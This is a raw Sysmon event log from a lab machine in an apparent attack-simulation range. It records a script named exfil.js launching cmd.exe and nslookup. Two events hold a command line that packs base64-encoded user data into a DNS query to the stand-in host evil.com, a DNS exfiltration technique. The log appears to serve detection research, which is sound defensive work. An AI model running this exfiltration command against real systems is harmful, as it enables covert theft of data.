14:21:46.476{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nllmykpo.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213979Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.461{2E1864BB-18FA-629A-AD45-000000005F02}49082672C:\Windows\system32\conhost.exe{2E1864BB-18FA-629A-AE45-000000005F02}2764C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213978Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.461{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213977Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.461{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213976Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.461{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213975Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.461{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213974Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.461{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FA-629A-AE45-000000005F02}2764C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213973Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.461{2E1864BB-18FA-629A-AC45-000000005F02}60365216C:\Windows\system32\cmd.exe{2E1864BB-18FA-629A-AE45-000000005F02}2764C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213972Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.465{2E1864BB-18FA-629A-AE45-000000005F02}2764C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FA-629A-AC45-000000005F02}6036C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllmykpo.tmp 2>&1 10341000x8000000000000000213971Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.445{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FA-629A-AD45-000000005F02}4908C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213970Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.445{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FA-629A-AD45-000000005F02}4908C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213969Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.430{2E1864BB-18FA-629A-AD45-000000005F02}49082672C:\Windows\system32\conhost.exe{2E1864BB-18FA-629A-AC45-000000005F02}6036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213968Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.430{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FA-629A-AD45-000000005F02}4908C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213967Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.430{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213966Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.430{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213965Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.430{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213964Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.430{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213963Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.414{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FA-629A-AC45-000000005F02}6036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213962Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.414{2E1864BB-18E0-629A-6742-000000005F02}39767648C:\Windows\System32\WScript.exe{2E1864BB-18FA-629A-AC45-000000005F02}6036C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213961Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.429{2E1864BB-18FA-629A-AC45-000000005F02}6036C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllmykpo.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 354300x8000000000000000213960Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.726{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51146- 354300x8000000000000000213959Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.726{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51145- 354300x8000000000000000213958Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.726{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51144- 354300x8000000000000000213957Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.644{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51143- 354300x8000000000000000213956Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.644{00000000-0000-0000-0000-000000000000}3300<unknown process>-udptruefalse127.0.0.1-51143-false127.0.0.1-53domain 354300x8000000000000000213955Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.644{00000000-0000-0000-0000-000000000000}3300<unknown process>-udpfalsefalse127.0.0.1-51142-false127.0.0.1-53domain 354300x8000000000000000213954Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.644{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51142- 354300x8000000000000000213953Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.643{00000000-0000-0000-0000-000000000000}3300<unknown process>-udpfalsefalse127.0.0.1-51141-false127.0.0.1-53domain 354300x8000000000000000213952Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.643{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51141- 354300x8000000000000000213951Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.641{00000000-0000-0000-0000-000000000000}3300<unknown process>-udptruefalse127.0.0.1-51141-false127.0.0.1-53domain 23542300x8000000000000000213950Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.414{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nluxmnc.tmpMD5=1BE0CADB6C0F327AC397E79E76114FEF,SHA256=8716405641FB55158926538865C7AE114B3765D3AEA889805DB014655C2FA08F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000213949Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.563{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51140- 354300x8000000000000000213948Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.563{00000000-0000-0000-0000-000000000000}5404<unknown process>-udpfalsefalse127.0.0.1-51139-false127.0.0.1-53domain 354300x8000000000000000213947Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.563{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51139- 354300x8000000000000000213946Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.563{00000000-0000-0000-0000-000000000000}5404<unknown process>-udptruefalse127.0.0.1-51139-false127.0.0.1-53domain 354300x8000000000000000213945Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.563{00000000-0000-0000-0000-000000000000}5404<unknown process>-udpfalsefalse127.0.0.1-51138-false127.0.0.1-53domain 354300x8000000000000000213944Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.562{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51138- 354300x8000000000000000213943Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.562{00000000-0000-0000-0000-000000000000}5404<unknown process>-udptruefalse127.0.0.1-51138-false127.0.0.1-53domain 354300x8000000000000000213942Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.451{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51137- 354300x8000000000000000213941Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.451{00000000-0000-0000-0000-000000000000}8012<unknown process>-udptruefalse127.0.0.1-51137-false127.0.0.1-53domain 354300x8000000000000000213940Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.354{00000000-0000-0000-0000-000000000000}6372<unknown process>-udpfalsefalse127.0.0.1-51136-false127.0.0.1-53domain 354300x8000000000000000213939Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.354{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51136- 354300x8000000000000000213938Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.354{00000000-0000-0000-0000-000000000000}6372<unknown process>-udptruefalse127.0.0.1-51136-false127.0.0.1-53domain 354300x8000000000000000213937Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.352{00000000-0000-0000-0000-000000000000}6372<unknown process>-udpfalsefalse127.0.0.1-51135-false127.0.0.1-53domain 354300x8000000000000000213936Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.352{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51135- 354300x8000000000000000213935Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.352{00000000-0000-0000-0000-000000000000}6372<unknown process>-udptruefalse127.0.0.1-51135-false127.0.0.1-53domain 354300x8000000000000000213934Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.351{00000000-0000-0000-0000-000000000000}6372<unknown process>-udpfalsefalse127.0.0.1-51134-false127.0.0.1-53domain 354300x8000000000000000213933Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.351{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51134- 354300x8000000000000000213932Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.238{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51133- 354300x8000000000000000213931Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.238{00000000-0000-0000-0000-000000000000}5836<unknown process>-udptruefalse127.0.0.1-51133-false127.0.0.1-53domain 354300x8000000000000000213930Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.238{00000000-0000-0000-0000-000000000000}5836<unknown process>-udpfalsefalse127.0.0.1-51132-false127.0.0.1-53domain 354300x8000000000000000213929Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.238{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51132- 354300x8000000000000000213928Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.237{00000000-0000-0000-0000-000000000000}5836<unknown process>-udptruefalse127.0.0.1-51132-false127.0.0.1-53domain 354300x8000000000000000213927Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.237{00000000-0000-0000-0000-000000000000}5836<unknown process>-udpfalsefalse127.0.0.1-51131-false127.0.0.1-53domain 354300x8000000000000000213926Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.236{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51131- 354300x8000000000000000213925Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.236{00000000-0000-0000-0000-000000000000}5836<unknown process>-udptruefalse127.0.0.1-51131-false127.0.0.1-53domain 354300x8000000000000000213924Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.148{00000000-0000-0000-0000-000000000000}4284<unknown process>-udpfalsefalse127.0.0.1-51130-false127.0.0.1-53domain 354300x8000000000000000213923Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.148{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-51130- 354300x8000000000000000213922Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.148{00000000-0000-0000-0000-000000000000}4284<unknown process>-udptruefalse127.0.0.1-51130-false127.0.0.1-53domain 